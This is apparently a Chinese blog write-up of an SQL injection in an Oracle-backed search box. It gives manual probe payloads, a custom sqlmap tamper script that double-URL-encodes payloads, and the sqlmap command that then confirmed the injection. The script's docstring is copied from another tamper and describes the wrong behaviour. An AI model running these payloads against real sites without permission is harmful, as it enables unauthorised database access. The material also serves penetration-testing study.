遇到 一個搜索框

通過輸入以下 內容：
123                                    返回正常
123%' and '%'='               返回正常
123%' and '%'=' a           返回 為空
123%‘--                            返回正常
123%' and (select 113 from dual)=123--  返回正常

初步判定 為 oracle的 搜索型注入

0x01 遇到問題
按照一般的做法截包然后提交給 sqlmap，但是奇怪的sqlmap竟然無法識別出注入點 

截包看了下手工注入的數據包，發現%變成了%2525  
因此考慮到url編碼了

然后查看源碼

&classcode="+classcode+"&keyName="+encodeURI(encodeURI(keyName)));
果然是encodeURI編碼，并且是兩次

0x02 解決問題

查看了下sqlmap自帶的tamper，好像還沒有針對這種的編碼
于是 找了個最簡單的 tamper做模板，簡單修改了下代碼，代碼如下

#!/usr/bin/env python

"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re
from urllib import quote
from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces each keyword character with lower case value

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases

    >>> tamper('INSERT')
    'insert'
    """

    retVal = payload
    retVal = quote(quote(retVal))

        
    return retVal
然后sqlmap加載改 tamper
sqlmap.py -r c:\tmp\1.txt -p keyName --random-agent --tamper urlencode2

sqlmap成功確認為 oracle注入